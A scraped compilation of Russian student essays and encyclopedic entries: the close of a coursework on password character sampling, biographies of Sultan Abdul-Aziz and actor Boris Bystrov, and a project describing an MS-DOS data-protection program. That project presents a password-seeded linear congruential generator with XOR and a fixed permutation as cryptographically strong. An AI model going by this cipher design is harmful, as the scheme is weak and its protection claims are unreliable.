Из проведённых расчётов видно, что наибольшая вероятность введения злоумышленником верного пароля при подглядывании достигается при фиксированной длине выборки в 3 символа (что в принципе ожидаемо).
Заметим, что вероятность узнавания пароля одинакова как для выборки в 4 так и для выборки в 5 символов. Это можно объяснить известным математическим фактом: число сочетаний из k по t максимально при t=k/2; следовательно вероятность, как обратная функция к числу сочетаний, минимальна при данном условии; а так как из условия t = 4.5 , то «равноудалённые» от минимума вероятности выборок в 4 и 5 символов, равны.
Очевидно, что подглядывание значительно увеличивает возможность входа в систему злоумышленником.
3.2 Оптимизация длины выборки при заданном количестве подглядываний для максимальной защищённости от угадывания и подглядывания.
Вероятность входа при длине выборки в 3 символа при 10 подглядываниях равна 0.119, при выборке 4 или 5 символов – 0,079 , а при выборке случайной длины – 0,0926.
Таким образом, как видно из расчётов при заданных условиях, оптимальным с точки зрения защиты, является, длина выборки 4 или 5 символов.
Для повышения надёжности данной системы необходимо провести комплекс мер, предотвращающих или хотя бы существенно затрудняющих подглядывание, либо существенно увеличить длину пароля и/или размерность алфавита.
Заключение
В данной курсовой работе мы ознакомились с одним из методов паролирования – методом выборки символов. Был произведён анализ эффективности метода случайной выборки символов для повышения защищенности системы паролей, а так же произведены расчёты, по определению вероятности входа в систему злоумышленника при заданной длине выборки символов, длине пароля и алфавита.
Анализ метода случайной выборки показал некоторое понижение защищенности. Этот метод является вполне эффективным в том случае, когда злоумышленник в состоянии зафиксировать запрос системы и ответ пользователя за несколько подглядываний.
В случае перехвата пароля злоумышленник получает только символы, входящие в пароль, но не их последовательность. В рассмотренном случае перебор всех вариантов пароля из полученных символов составляет порядка 9!=362880 вариантов (по сравнению с одним вариантом при вводе полного пароля при каждом сеансе). Следовательно, для ещё большей эффективности метода выборки символов следует позаботиться о том, чтобы злоумышленник не смог получить запрос системы.
В целом, метод выборки является достаточно надежным способом повышения защищенности систем на основе паролей.
Список литературы
Лекции «Теория информационной безопасности и методология защиты информации», составитель Агзамов З.В.
ГОСТ Р50922-96. Защита информации. Основные термины и определения.
Н.Ш. Кремер, Теория вероятностей и математическая статистика: учебник для вузов. – М.: ЮНИТИ-ДАНА, 2000. – 543 с.
www.statsoft.ru
2 |
https://doc4web.ru/istoriya/abdulaziz.html | Абдул-Азиз | https://doc4web.ru/uploads/files/196/ce6b7b96713e06dd5407923257556a84.docx | files/ce6b7b96713e06dd5407923257556a84.docx | Абдул-Азиз
Абдул-Азиз (1830–1876), 32-й султан Османской империи и второй султан периода танзимата, реформ, начатых его братом султаном Абдул-Меджидом I и проводившихся министрами Али-пашой и Фуад-пашой. Абдул-Азиз, сын султана Махмуда II, стал преемником Абдул-Меджида I в 1861 и правил до 1876, когда был низложен конституционалистами.
Реформы
В области управления старая феодальная система была заменена новой строго централизованной административно-территориальной системой, созданной по французскому образцу. Функции центральной исполнительной власти были постепенно переданы вновь учрежденным советам, которые из простых консультативных органов превратились в министерства современного типа.
В области права «люди танзимата», как называли реформаторов, стремились гарантировать личную безопасность, уважительное отношение и неприкосновенность граждан независимо от их расовой и религиозной принадлежности, а также имущественного положения. Старая общинная система осталась в неприкосновенности, но немусульманские члены общины («райя») получили равные права с мусульманами, а старейшин и других местных правителей, пользовавшихся неограниченной и порой деспотичной властью, заменили выборными советами. Вводились новые гражданские кодексы, составленные по образцу европейских, хотя и сохранившие многие элементы старого исламского права, на чем настоял Ахмед Джевдет-паша, возглавлявший судебную комиссию и являвшийся близким другом Абдул-Азиза. Была введена регулярная система воинского призыва, и поскольку подданные-немусульмане получили равные юридические права, они стали призываться в османскую армию наряду с мусульманами.
Однако из-за сопротивления военных и чиновников, пользовавшихся изъянами старой системы для разного рода злоупотреблений, реформы оказались половинчатыми. Сыграла свою роль и общая оппозиция мусульман новым привилегиям, предоставленным немусульманам, так как большинство из них были навязаны Абдул-Азизу и его правительству европейскими державами. При этом немусульманские меньшинства, с энтузиазмом воспринявшие юридическое равенство, пытались сохранить привилегии, полученные ими в компенсацию за ограничение своих прав, например освобождение от воинской службы. Оппозицию поддерживали европейские державы, каждая из которых использовала свое влияние, чтобы расширить особые привилегии меньшинств и тем самым укрепить собственные позиции в империи. Действовавшая через своего посла Стратфорда Радклифа Великобритания, а также Франция, как правило, стремились защитить территориальную целостность Османской империи, навязывая Абдул-Азизу новые реформы, в то время как Австрия, Россия и Пруссия пытались развалить Империю и воспрепятствовать проведению реформ.
В оппозиции танзимату находились также представители нового слоя интеллигенции, «новые османы», во главе которых стояли писатели Зия-паша и Намик Кемаль. Новые османы требовали проведения демократических социальных реформ, модернизации системы управления и армии, введения конституционных ограничений на все еще сохранявшуюся автократическую власть султана и правящего класса.
Сам по себе Абдул-Азиз был человеком слабым, готовым принимать реформы, пока он находился под влиянием сильных министров – Али-паши и Фуад-паши. Он стал первым османским султаном, ставшим относительно доступным для своих подданных, и даже присутствовал на светских приемах, которые устраивали европейцы, проживавшие в Стамбуле. В 1867 Абдул-Азиз первым из османских правителей совершил турне по Европе.
Упадок государственной власти и свержение султана
После смерти Али-паши в 1871 вокруг Абдул-Азиза собрались менее способные министры, главным из которых был великий визирь Махмуд Недим-паша. Махмуд Недим переориентировал внешнюю политику страны с Англии и Франции на Россию, чей посол в Стамбуле Н.П.Игнатьев приобрел значительное влияние на султана. В области внутренней политики многие из реформ танзимата были приостановлены или игнорировались, государственная власть погрязла в кумовстве и взяточничестве, а расточительные расходы покрывались за счет полученных под разорительные проценты иностранных займов. Финансовая политика Махмуда Недима привела в 1875 к фактическому банкротству страны. В этот же период османы потерпели поражение от своих бывших балканских подданных в балканских войнах 1875–1876. После этого конституционное движение во главе с Мидхат-пашой и Хусейном Авни-пашой свергло Абдул-Азиза с престола и провозгласило Конституцию, ссылаясь на то, что причиной внутренних и внешних бедствий для страны был неограниченный абсолютизм Абдул-Азиза и правящей верхушки.
Абдул-Азиз недолгое время прожил в Стамбуле при своем преемнике Мураде V, но 4 июня 1876 был найден мертвым с перерезанными венами. Вопрос о том, совершил ли он самоубийство или был убит Мидхат-пашой и его сторонниками, остается без ответа. |
https://doc4web.ru/istoriya/bistrov-boris-evgenevich.html | Быстров, Борис Евгеньевич | https://doc4web.ru/uploads/files/210/65a752b83c39e055e3244d29b647fbfd.docx | files/65a752b83c39e055e3244d29b647fbfd.docx | План
Введение
1 Биография
2 Творчество
2.1 Роли в театре
2.2 Фильмография
3 Озвучание
3.1 Фильмы
3.2 Сериалы
3.3 Мультсериалы
3.4 Компьютерные игры
Список литературы
Введение
Борис Евгеньевич Быстров — советский и российский актёр кино и дубляжа. Заслуженный артист России (1995)[1], Народный артист России (2001)[2].
1. Биография
В 1966 году окончил Школу-студию МХАТ (курс А. М. Карева).[3] После выпуска служил в театре Ленком. С 1968 года актёр Московского драматического театра им. М. Н. Ермоловой.[2] Играл в спектаклях: «Балы и страсти Петербурга», «Невольницы», «Измена», «Как любил я Вас!», «Хищница». И по сей день он остается ведущим актером этого театра.
Начал карьеру на киностудии им. Горького, с 70-х годов и по настоящее время (уже около тридцати лет) актер работает на озвучивании мультфильмов и дубляже зарубежных художественных фильмов. Озвучивал Марлона Брандо во всех русских переводах. В мультипликационных сериалах «Симпсоны» и «Футурама» он озвучил все мужские роли.
Первой его женой стала Инна Кмит (1932—1996), дочь популярного актера Леонида Кмита. Дочь Бориса Быстрова и Инны Кмит — Екатерина Кмит — тоже стала актрисой. Она снималась в картинах: «Охота на сутенера», «За последней чертой», сериале «Транзит для дьявола» и многих других. Второй женой была известная балерина и танцовщица эстрадных танцев Татьяна Лейбель.
В настоящее время Борис Евгеньевич женат на актрисе Ирине Савиной. В 1989 году у них родился сын Николай. Он уже в 12 лет успел озвучить несколько фильмов. Борис Быстров рассказывает:[4]
«Бывает и так, что нужны дети, просят тогда: Дайте ребенка записать. Поэтому он тоже несколько фильмов записал с нами».
2. Творчество
2.1. Роли в театре
«Разлом» Б. Лавренёва — Годун[2]
«Снега» — Павел
«Деньги для Марии» — Василий
«Дон Жуан приходит с войны» — Дон Жуан
«Балы и страсти Петербурга» — князь Меншиков
«Касатка» А. Н. Толстого — Абрам Желтухин
«Хищница» — Жан Руже
«Бедность не порок» А. Н. Островского — Коршунов
«Лунные воды» - Полковник Сэлби
«Двенадцатая ночь» - Сэр Тоби Белч
2.2. Фильмография
1966 — Волшебная лампа Аладдина — Аладдин
1968 — Удар! Ещё удар! — Стародуб
1969 — Встреча у старой мечети
1970 — Приключения желтого чемоданчика — лётчик Верёвкин
1977 — Следствие ведут знатоки. «Букет» на приеме — Борис Петухов
1984 — ТАСС уполномочен заявить… — Агафонов, майор КГБ, следователь
1986 — Бармен из «Золотого якоря» — эпизод
1987 — В Крыму не всегда лето
1997 — Дезертир
2008 — Исаев — Спиридон Меркулов
3. Озвучание
3.1. Фильмы
Гарри Поттер и Дары Смерти: часть 1 (2010) — Аластор Грюм
Большая игра (2009) — Джордж Фергус
Адреналин 2: Высокое напряжение (2009)
Звёздный путь (2009) — старый Спок
Операция Валькирия (2008) — генерал Вильгельм Кейтель
Темный рыцарь (2008) — дворецкий Альфред
Кунг-фу Панда — мастер Угвей
Звездная пыль (2007) — предсказатель
Такси 4 (2007) — префект
Призраки Гойи (2006) — монах
Счастливое число Слевина (2006) — Эйб
Кинг Конг (2005) — Херб
Бэтмен: Начало (2005) — дворецкий Альфред
Где скрывается правда (2005) — Салли Санмарко
Гарольд и Кумар уходят в отрыв (2004) — офицер Брукс
Широко шагая (2004) — Крис Вон
Такси 3 (2003) — продавец
Звонок (2002) — Ричард Морган
Мажестик (2001) — Эвери Уайет
Расплата (1999) — детектив Хикс
Робби - Северный Олень (1999) — Блицен, Старина Джингл
Час пик (1998) — Клайв Код
Подъем с глубины (1998) — Гановер
Собиратель костей (1998)
Письма убийцы (1998) — половина мужских ролей (закадр для ТВ-6)
Мышиная охота (1997) — Александр Фалко
Завтра не умрет никогда (1997) — Генри Гупта
Поворот (1997) — Даррелл
Люди в черном (1997) — Эдгар
Убийство в Белом доме (1997) — Джеффри Артур Гровз
Страшилы (1996) — Сайрус
Клетка для пташек (1996) — Гарри Рэдман
Сломанная стрела (1996) — полковник Макс Уилкинс
Космический джем (1996)
Между ангелом и бесом (1995) — треть мужских ролей (закадр., ТВЦ)
Мэверик (1994) — Зейн Купер, Брет Мэверик
Пришельцы (1993) — герцог
Список Шиндлера (1993) — Амон Гот
Беглец (1993) — Детектив Келли
Эйс Вентура: Розыск домашних животных (1993) (Варус-Видео)
Последний бойскаут (1991) — Шелли Марконе
Капитан Крюк (1991) — Мэгги Беннинг
Кишан и Канхайя (1990)
Славные парни (1990) — Пол Кикеро
Подводные береты (1990)
Танго и Кэш (1989) — Ив Пэрре
Жажда мести (1988)
Кто подставил Кролика Роджера (1988) — Анджело
Неукротимый (1988) — Д-р Ричард Уокер
Сердце ангела (1987) — Итан Круземарк
Враг мой (1985) — Джериба Шиган
Гремлины (1984) — Рэндал Пельтцер (Варус-Видео)
Детективы Агаты Кристи: Простота убийства (1982)
Только для твоих глаз (1981)
Вечная сказка любви (1977) — Дхарам Сингх
Принцип домино (1977) — Рой Такер
Крестный отец 2 (1974)
Изгоняющий дьявола (1973) — Отец Дайер
Крестный отец (1972)
3.2. Сериалы
1999 — 2003 — На краю Вселенной — Райджел, мужские роли (часть серий)
1998 — Вавилон 5 — президент Джон Шеридан, Г'Кар — 5-й сезон
1990 — 2000 — Беверли-Хиллз 90210 — Джим Уолш
1991 — Динозавры — Эрл Синклер — со 2-го сезона
3.2. Сериалы
1989 — Симпсоны[5] — с 9 по 16 сезон включительно, также 19 сезон (все мужские голоса), с 20-го сезона — половина мужских голосов (Ren-TV и озвучание студии Hedgehog Riders для 2x2)
2007 — Симпсоны в кино — Гомер Симпсон
1999 — 2003 — Футурама — все мужские голоса
2001 — Флиппер и Лопака
2000 — Скуби-Ду и захватчики-инопланетяне (Варус-Видео)
1998 — Скуби-Ду на острове Мертвецов (Варус-Видео)
1993 — Озорные анимашки
1994 — Аладдин — попугай Яго
1994 — ААА!!! Настоящие монстры — Крамм
1992 — Город собак — мужские голоса (в озвучании Ren-TV)
1991 — Чёрный Плащ — агент Гризликов, Кометчик, Тарас Бульба (эпизод «Час быка»)
1990 — Чудеса на виражах — Балу (русский дубляж в 1992 году)
1993 — Новые приключения Спиди-гонщика — Попс
1969 — Скуби-Ду — второстепенные персонажи
1930 — (1993—1994 гг.) — мультфильмы про Багса Банни (ТВ-6)
3.4. Компьютерные игры
StarCraft II: Wings of Liberty - Рори Свонн
World Of Warcraft - орки
Список литературы:
Награждён указом президента России № 78 от 27 января 1995 года
Страница Бориса Быстрова на сайте театра имени Ермоловой
Школа-студия МХАТ: 1960-1969
Борис Быстров — биография на Кино-Театр.РУ
Всё о Симпсонах! — Борис Быстров и Ирина Савина
Источник: http://ru.wikipedia.org/wiki/Быстров,_Борис_Евгеньевич |
https://doc4web.ru/informatika/zaschita-dannih-ot-nesankcionirovannogo-dostupa.html | Защита данных от несанкционированного доступа | https://doc4web.ru/uploads/files/180/610c8f91584c029341952b79c6efa037.docx | files/610c8f91584c029341952b79c6efa037.docx | Защита данных от несанкционированного доступа
1. Введение.
Появившиеся в начале 80-ых персональные ЭВМ (ПЭВМ или ПК) прочно вошли во все сферы человеческой деятельности. Вместе с ними у эксплуатирующих ПЭВМ организаций и ведомств возникли и многочисленные проблемы. Одна из них — защита информации. Согласно статистическим данным более 80% компаний и агентств несут финансовые убытки из-за нарушения безопасности данных.
Проблема защиты информации представляет собой совокупность тесно связанных проблем в областях права, организации управления, разработки технических средств, программирования и математики. Одна из центральных задач проектирования систем защиты состоит в рациональном распределении имеющихся ресурсов.
Характерная особенность использования ПЭВМ в нашей стране заключатся в том, что доступ к ним имеют многие пользователи. В связи с таким "многопользовательским" режимом работы возникает целый набор взаимосвязанных вопросов по защите информации, хранящейся в ПЭВМ.
При создании и использовании ПЭВМ возникает целый ряд взаимосвязанных теоретических и практических проблем. В коммерческих и военных областях одной из основных является проблема защиты информации. Так можно выделить следующие объективные причины, определяющие важность проблемы защиты информации:
высокие темпы роста парка ПЭВМ, находящихся в эксплуатации;
широкое применение ПЭВМ в самых различных сферах человеческой деятельности;
высокая степень концентрации информации в ПЭВМ;
совершенствование способов доступа пользователей к ресурсам ПЭВМ;
усложнение вычислительного процесса в ПЭВМ.
Усложнение методов и средств организации машинной обработки информации приводят к тому, что информация становится все более уязвимой. Этому способствуют такие факторы, как постоянно возрастающие объемы обрабатываемых данных, накопление и хранение данных в ограниченных местах, постоянное расширение круга пользователей, имеющих доступ как к ресурсам ПЭВМ, так и к программам и данным, хранящихся в них, усложнение режимов эксплуатации вычислительных систем и т. п. [6]
1. Постановка задачи
1. 1. Организационно-экономическая сущность задачи
Защита информации в процессе ее сбора, хранения и обработки принимает исключительно важное значение. Под защитой информации принято принимать совокупность мероприятий, методов и средств, обеспечивающих решение следующих задач:
проверка целостности информации;
исключение несанкционированного доступа к защищаемым программам и данным;
исключение несанкционированного использования хранящихся в ПЭВМ программ (т. е. защита программ от копирования).
Использование ПЭВМ в военной, коммерческой и других областях человеческой деятельности порождает ряд специфических проблем, которые необходимо решить для защиты обрабатываемой и хранящейся в ПЭВМ информации. Одной из них является классификация возможных каналов утечки информации. Под возможным каналом утечки подразумевается способ, позволяющий нарушителю получить доступ к обрабатываемой и хранящейся в ПЭВМ информации [7].
Классификацию возможных каналов утечки информации исходя из типа средства, являющегося основным при получении информации по возможному каналу утечки. Следовательно, можно выделить три типа средств: человек, аппаратура, программа. Применительно к ПЭВМ группу каналов, в которых основным средством является человек, составляют следующие основные возможные каналы утечки:
хищение носителей информации (дискет; лазерных, магнитных и магнитооптических дисков и т. д.);
чтение информации с экрана посторонним лицом (во время отображения информации на экране законным пользователем или при отсутствии законного пользователя на рабочем месте);
чтение информации из оставленных без присмотра распечаток программ.
В группе каналов, в которых основным средством является аппаратура, можно выделить следующие основные каналы утечки :
подключение к устройствам ПЭВМ специально разработанных аппаратных средств,
обеспечивающих доступ к информации;
использование специальных технических средств для перехвата электромагнитных излучений технических средств ПЭВМ.
В группе каналов, в которых основным средством является программа, можно выделить следующие основные каналы утечки :
несанкционированный доступ программы к информации;
расшифровка программой зашифрованной информации;
копирование программой информации с носителей.
В данной работе нас интересует последняя группа поэтому система защиты данных от несанкционированного доступа должна обеспечивать выполнение следующих функций:
идентификация ресурсов, т. е. присвоение ресурсам идентификаторов — уникальных признаков, по которым в дальнейшем система производит аутентификацию;
аутентификация защищаемых ресурсов, т. е. установление их подлинности на основе сравнения с эталонными идентификаторами;
разграничение доступа пользователей по операциям над ресурсами (программы, данные), защищаемыми с помощью программных средств;
администрирование:
определение прав доступа к защищаемым ресурсам,
установка системы защиты на ПЭВМ ,
снятие системы защиты с ПЭВМ,
контроль целостности и работоспособности систем защиты.
Во время создания системы защиты можно выделить следующие основные принципы, которых следует придерживаться при проектировании:
Простота механизма защиты. Этот принцип общеизвестен но не всегда глубоко осознается. Действительно, некоторые ошибки, не выявленные в ходе проектирования и эксплуатации, позволяют обнаружить неучтенные пути доступа. Необходимо тщательное тестирование программного или аппаратного средства защиты, однако на практике такая проверка возможна только для простых и компактных схем.
Отсутствие доступа. В механизме защиты в нормальных условиях доступ должен отсутствовать, и для работы системы защиты необходимы условия, при которых доступ становится возможным. Кроме того, считается, что запрет доступа при отсутствии особых указаний обеспечивает высокую степень надежности механизма защиты.
Механизм защиты можно не засекречивать, т. е. не имеет смысла засекречивать детали реализации систем защиты, предназначенной для широкого пользования.
Психологическая привлекательность. Система защиты должна быть простой в эксплуатации [6].
Исходя из этого, требуется разработать систему защиты от несанкционированного доступа, которая должна обеспечивать выполнение следующих функций:
аутентификация пользователя по паролю и по ключевой дискете;
шифрование выбранных файлов;
установка на программы защиты от несанкционированного запуска;
реакция на несанкционированный доступ.
1. 2. Входная информация
Т. к. программа работает с файлами (шифрование, установка защит), то входными данными являются файлы различного типа для шифрования и EXE- и COM-файлы для установки пароля и проверки по ключевой дискете.
1. 3. Постоянная информация
В качестве постоянной информации используются таблицы перестановок и константы генератора псевдослучайных чисел при шифровании файлов (подробнее см. Описание программы. Криптография).
1. 4. Выходная информация
Выходные данные — зашифрованные файлы и защищенные программы.
2. Вычислительная система
2. 1. Операционная система
Программа “Защита данных от НСД” разрабатывалась под управлением операционной системы MS-DOS 6.22. Предполагается, что программа будет работать без сбоев с MS-DOS и PC-DOS версий не ниже 5.0.
Операционная система (ОС) является неотъемлемой частью ПЭВМ. ОС обеспечивает управление всеми аппаратными компонентами и поддержку работы программ пользователя, предоставляя ему возможность общего управления машиной.
К основным достоинствам MS DOS относятся:
возможность организации многоуровневых каталогов;
возможность подключения пользователем дополнительных драйверов внешних устройств;
возможность работы со всеми последовательными устройствами как с файлами;
развитый командный язык;
возможность запуска фоновых задач одновременно с диалоговой работой пользователя и др.
Важнейшей особенностью MS DOS является модульность, что позволяет при необходимости расширения функций системы модифицировать отдельные ее модули. DOS состоит из следующих основных модулей:
базовая система ввода/вывода (BIOS);
блок начальной загрузки (Boot Record);
модуль расширения базовой системы ввода/вывода(___BIO.COM);
модуль обработки прерываний (___DOS.COM);
командный процессор (COMMAND.COM);
утилиты DOS.
Достоинством DOS является то, что любая программа может играть роль сервисной, поскольку для ее запуска достаточно указать лишь имя файла, в котором она содержится. Следовательно, с точки зрения пользователя такие программы не отличаются от встроенных команд DOS. Программа может воспринимать параметры, задаваемые в командной строке. Храниться она может в любом каталоге на любом диске. Указанное свойство делает ДОС открытой для расширения. Неизменное ядро системы составляют лишь BIOS и три основных моду- ля: BIO.COM, DOS.COM и COMMAND.COM Общий объем оперативной памяти, занимаемой этими модулями, составляет до 60 Кбайт.
2. 2. Технические средства реализации задачи
Программа работает на компьютерах клона IBM, начиная с процессора Intel 80-286. Требуемый объем оперативной памяти — минимум 1,5 Mb. Минимальные требования к видеоаппаратуре — карта VGA и 256 Kb видеопамяти.
2. 3. Программные средства реализации задачи
Программа “Защита данных от несанкционированного доступа” разработана в среде Borland Pascal 7.0 (Borland International ©, 1992). Пакет Borland Pascal 7.0 учитывает новейшие достижения в программировании и практике создания программ и включает в себя три режима работы:
обычный режим операционной системы MS-DOS
защищенный режим MS-DOS
режим Windows.
Пакет Borland Pascal включает в себя как язык программирования — одно из расширений языка Паскаль для ПЭВМ клонов IBM, так и среду, предназначенную для написания, отладки и запуска программ.
Язык характеризуется расширенными возможностями по сравнению со стандартом, хорошо развитой библиотекой модулей, позволяющих использовать возможности операционной системы, создавать оверлейные структуры, организовывать ввод-вывод, формировать графические изображения и т. д.
Среда программирования позволяет создавать тексты программ, компилировать их, находить ошибки и оперативно их исправлять, компоновать программы из отдельных частей, включая стандартные модули, отлаживать и выполнять отлаженную программу. Пакет предоставляет пользователю также большой объем справочной информации.
Версия 7.0 также, как и предыдущая, позволяет применять объектно-ориентированное программирование, обладает встроенным ассемблером, имеет инструментальное средство создания интерактивных программ — Turbo Vision, но появился ряд характерных особенностей:
выделение цветом различных элементов программы;
ряд дополнительных расширений языка, таких, как использование открытых массивов, параметров-констант, типизированного адресного оператора @ и т. д.;
расширенные возможности объектно-ориентированного программирования;
усовершенствованные программы Turbo Vision [2].
При написании программы также использовался интегрированный пакет Turbo Vision 2.0. При создании прикладной программы программист большие усилия затрачивает на организацию ввода-вывода информации, т. е. на формирование интерфейса. Они соизмеримы с усилиями, затрачиваемыми на программирование основного алгоритма программы, по которому решается конкретная задача. Работа, связанная с организацией ввода-вывода, повторяется от программы к программе, требует выполнения однотипных операций, отвлекает внимание программиста от выполнения основной задачи.
Прекрасным средством упрощения работы по организации ввода-вывода, его унификации с учетом требований к интерфейсу программ является разработанный фирмой Borland International пакет Turbo Vision 2.0, представляющий объектно-ориентированную библиотеку средств формирования пользовательского интерфейса. Кстати, интерфейс самого Borland Pascal 7.0 (и Turbo Pascal 7.0 тоже) построен на стандартных объектах Turbo Vision 2.0.
Согласно этому рисунку программу можно представить как совокупность двух частей: часть программы, обеспечивающая решение основной программы, и часть, обеспечивающая организацию ввода-вывода с внешних устройств (на внешние устройства), — так называемый интерфейс программы. В основную часть (из основной части) информация может передаваться двумя способами — непосредственная передача информации (например, программа формирует какие-то данные и размещает их в конкретном файле на магнитном диске) и передача информации с помощью организации диалога (например, после формирования тех же данных происходит уточнение, в какой конкретно файл следует поместить сформированную информацию). Способ, основанный на организации диалога, является более универсальным и именно для организации диалога предназначен в первую очередь пакет Turbo Vision.
В программах, работающих в текстовом режиме, диалог обычно организуется с помощью трех средств: меню, диалоговых окон и строк состояния [3].
Также при создании программы использовался ассемблер — машинно-ориентированный язык. На ассемблере написаны основные подпрограммы, где требуется высокое быстродействие и минимальный размер программного кода.
3. Алгоритм задачи
Программу условно можно разделить на несколько частей:
Инсталляционный модуль.
Оболочка программы (написана с использованием Turbo Vision 2.0).
Криптографическая защита (Borland Pascal 7.0).
Защита программ паролем (TASM 3.0).
Защита программ с помощью ключевой дискеты (TASM 3.0).
Блокировка винчестера (TASM 3.0).
3. 1 Инсталляционный модуль
Модуль инсталляции будет устанавливать программу на винчестер в определенный каталог, а также осуществлять привязку программы к уникальным идентификаторам BIOS.
3. 2. Оболочка программы
При создании интерактивного пользовательского интерфейса (оболочки программы) использовались стандартные объекты пакета Turbo Vision. Горизонтальное двухуровневое меню, строка состояния, рабочее поле, диалоговые окна, информационные сообщения и сообщения об ошибках, поддержка “мыши” — вот некоторые атрибуты оболочки.
3. 2. Криптографическая защита
Перед описанием алгоритма следует ввести некоторые термины.
Зашифрованием данных называется процесс преобразования открытых данных в зашифрованные с помощью шифра, а расшифрованием данных — процесс преобразования закрытых данных в открытые с помощью шифра.
Шифрованием называется процесс зашифрования или расшифрования данных.
Дешифрованием будем называть процесс преобразования закрытых данных в открытые при неизвестном ключе и, возможно, неизвестном алгоритме.
Криптографическая защита — это защита данных с помощью криптографического преобразования, под которым понимается преобразование данных шифрованием.
Уравнение зашифрования — соотношение, описывающее процесс образования зашифрованных данных из открытых данных в результате преобразований, заданных алгоритмом криптографического преобразования.
Уравнение расшифрования — соотношение, описывающее процесс образования открытых данных из зашифрованных данных в результате преобразований, заданных алгоритмом криптографического преобразования.
Под шифром понимается совокупность обратимых преобразований множества открытых данных на множество зашифрованных данных, заданных алгоритмом криптографического преобразования.
Криптостойкостью называется характеристика шифра, определяющая его стойкость к дешифрованию. Обычно эта характеристика определяется периодом времени, необходимым для дешифрования [6].
Принцип зашифрования заключается в генерации гаммы шифра с помощью датчика псевдослучайных чисел (ПСЧ) и наложением полученной гаммы на открытые данные с помощью логической операции “исключающее ИЛИ” (т. е. обратимым образом).
Процесс расшифрования данных сводится к повторной генерации гаммы шифра при известном ключе и наложению такой гаммы на зашифрованные данные. Полученный зашифрованный текст является достаточно трудным для раскрытия в том случае, когда гамма шифра не содержит повторяющихся битовых последовательностей. По сути дела гамма шифра должна изменяться случайным образом для каждого шифруемого слова. Фактически если период гаммы превышает длину всего зашифрованного текста и неизвестна никакая часть исходного текста, то шифр можно раскрыть только прямым перебором (подбором ключа). В этом случае криптостойкость определяется размером ключа.
Чтобы получить линейные последовательности элементов гаммы, используются датчики ПСЧ. К настоящему времени на основе теории групп разработано несколько типов таких датчиков.
В своей программе я использовал так называемый конгруэнтный генератор ПСЧ — наиболее доступный и эффективный. Для этого класса генераторов ПСЧ можно сделать математически строгое заключение о том, какими свойствами обладают выходные сигналы этих генераторов с точки зрения периодичности и случайности.
Этот датчик ПСЧ генерирует псевдослучайные числа с определенным периодом повторения, зависящим от выбранных значений A и C. Значение М обычно устанавливается равным 2b, где b — длина слова ЭВМ в битах. Датчик имеет максимальный период М до того, как генерируемая последовательность чисел начнет повторяться. Линейный конгруэнтный датчик ПСЧ имеет максимальную длину М тогда и только тогда, когда A mod 4 = 1 и С — нечетное. В своей программе я положил А = 5, С = 27, Т(0) — пароль, вводимый пользователем.
С полученной последовательностью Т(i) поступают следующим образом:
F(i) = T(i) xor D(i) (2)
Где в (2) D(i) — последовательность открытых данных, F(i) — последовательность
зашифрованных данных [4].
Также при разработке алгоритма шифрования использовался алгоритм американского федерального стандарта на шифрование данных — Data Encryption Standard (DES).
При зашифровании входные данные шифруются по формуле (2), далее обрабатываются блоками по 64 слова (word). Эта обработка заключается в следующем: :4 слова переставляются в соответствии с таблицей, изображенной на рис. 2:
[
8
48
16
56
24
64
32
39
7
47
15
55
23
63
31
38
6
46
14
54
22
62
30
37
5
45
13
53
21
61
29
36
4
44
12
52
20
60
28
35
3
43
11
51
19
59
27
34
2
42
10
50
18
58
26
33
1
41
9
49
17
57
25
Рис. 2. Перестановка после зашифрования.
Как видно из данной таблицы, слово 40 входной последовательности становится 1-ым, слово 8 — 2-ым и т. д.
Процесс расшифрования данных является инверсным относительно процесса зашифрования. Т. е. данные сначала переставляются в соответствии с таблицей, изображенной на рис. 3, а затем преобразуются по формуле (2). Как легко видеть, данная перестановка является обратной по отношению к начальной.
58
50
42
34
26
18
10
2
60
52
44
36
28
20
12
4
62
54
46
38
30
22
14
6
64
56
48
40
32
24
16
8
57
49
41
33
25
17
9
1
59
51
43
35
27
19
11
3
61
53
45
37
29
21
13
5
63
55
47
39
31
23
15
7
Рис. 3. Перестановка перед расшифрованием
4. Описание программы
При написании программы использовались следующие стандартные библиотеки Borland Pascal 7.0 и Turbo Vision 2.0:
Модуль Objects. Модуль Objects содержит основные определения объектов Turbo Vision, включая базовый объект иерархии Turbo Vision TObject, а также все невидимые элементы Turbo Vision: потоки, коллекции и ресурсы.
Модуль App. Модуль App (предоставлен в исходных кодах) обеспечивает элементы оболочки Turbo Vision. 4 очень мощных объектных типа определены в App, включая объекты TApplication и TProgram, которые служат в качестве программ Turbo Vision и объект панели экрана, который управляет большинством элементов в оконных программах.
Модуль Views. Модуль Views содержит основные компоненты видимых элементов и полезные компоненты более сложных групп, таких как рамки окон и полосы скроллинга. Более сложные видимые элементы находятся в модулях Dialogs и TextView.
Модуль Dialogs. Модуль Dialogs определяет большинство элементов наиболее часто используемых при создании диалоговых окон. Этот модуль включает сами диалоговые окна (которые являются специализированными окнами) и различные элементы управления, такие как кнопки, метки, зависимые и независимые кнопки, строки ввода и списки истории.
Модуль Menus. Модуль Menus обеспечивает все объекты и процедуры для системы меню Turbo Vision, включая выпадающие меню и активные элементы строки статуса.
Модуль Drivers. Модуль Drivers содержит все специализированные драйверы Turbo Vision, включая драйверы мышки и клавиатуры, поддержку экрана и систему обработки ошибок с монитором событий для программ, управляемых событиями.
Модуль Memory. Модуль Memory содержит процедуры монитора памяти Turbo Vision, которые обеспечивают функции управления кучей.
Модуль CRT. Модуль CRT содержит константы, переменные и подпрограммы, предназначенные для работы с консолью. В отличие от стандартного ввода-вывода, когда он осуществляется через операционную систему, подпрограммы этого модуля работают с BIOS и непосредственно с видеопамятью.
Модуль DOS. Модуль DOS позволяет использовать возможности операционной системы MS-DOS, не предусмотренные в стандарте языка Паскаль, и содержит типы, константы, переменные и для реализации этих дополнительных возможностей.
Кроме вышеперечисленных стандартных модулей был разработан модуль SetConf, в котором находится функция привязки программы к BIOS компьютера, т. е. защита от копирования.
При запуске программы в первую очередь проверяется целостность системы; т. е. наличие всех файлов системы, соответствуют ли их имена и размеры таблице. Далее происходит инициализация: проверяются параметры BIOS. Если какой либо файл системы был изменен или параметры BIOS не соответствуют установленным в программе, система работать не будет. Для входа в систему необходимо ввести пароль. Эти проверки осуществляются в конструкторе Init объекта TMyApp. Этот же объект инициализирует меню (TMyApp.InitMenu), строку состояния (TMyApp.InitStatusLine), рабочее поле (TMyApp.InitDeskTop), устанавливает специальную цветовую палитру (TMyApp.GetPalette). Обработка событий (нажатие клавиш клавиатуры, работа с “мышью”) осуществляется в методе HandleEvent объекта TMyApp. При выборе какого-либо пункта меню управление передается соответствующему объекту или вызывается нужная подпрограмма.
